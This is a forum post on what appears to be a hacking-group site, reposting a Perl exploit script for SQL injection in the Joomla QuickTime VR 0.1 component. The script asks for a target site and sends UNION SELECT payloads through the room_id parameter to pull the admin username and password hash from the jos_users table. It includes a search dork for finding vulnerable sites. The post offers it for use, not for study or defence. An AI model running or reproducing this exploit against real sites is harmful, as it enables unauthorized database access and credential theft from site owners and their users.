MARATHI TEAM
Welcome on the Marathi Team Forum.
To take full advantage of everything offered by
our forum, please log in if you are already a
member or join our community if you're not
yet....
Log in

I forgot my password

Top posting users this week

Nimbuzz id Maker
freebuzz is my love :D

user name

password

captcha


Joomla Component QuickTime VR 0.1 Remote SQL Injection Exploit

View previous topic View next topic Go down

Heart Joomla Component QuickTime VR 0.1 Remote SQL Injection Exploit

Post  storm on Thu Sep 12, 2013 10:52 am

Joomla Component QuickTime VR 0.1 Remote SQL Injection Exploit
03 july, 2008
Target: Joomla Component QuickTime VR 0.1
Impact: SQL injection

Joomla-QuickTime-expl.pl
03 july, 2008

#!/usr/bin/perl -w
# Joomla Component QuickTime VR v 0.1 Remote SQL Injection #
########################################
#[*] Found by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ]
#[*] Greetz : Mr.Al3FrItE & Islamic Security Team & Mounita20 &
#CoNaN and all musulmans hackers
#[*] Component_Name: QuickTime VR
#[*] Script_Name: Joomla
#[*] Dork : index.php?option=com_vr
########################################
# QuickTime VR
# Januari 2007
# Bob
# Pictura
# bob@pictura-dp.nl
# http://www.pictura-dp.nl/
# 0.1


system("color f");
print "\t\t################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t################################################\n\n";
print "\t\t#Joomla Component QuickTime Remote SQL Injection\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t################################################\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/joomla/): ";
chomp(my $target=);

$uname="username";
$magic="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?option=com_vr&Itemid=78
&task=viewer&room_id=-1%20union%20select%20concat
(CHAR(60,117,115,101,114,62),"
.$uname.",CHAR(60,117,115,101,114,62)),2 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /(.*?)/){

print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_vr&Itemid=78
&task=viewer&room_id=-1%20union%20select%20password,
2/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}

# codec by storm From Marathi Team
avatar
storm
Member
Member

Posts : 155
Points : 458
Reputation : 1
Join date : 2012-12-05

View user profile

Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum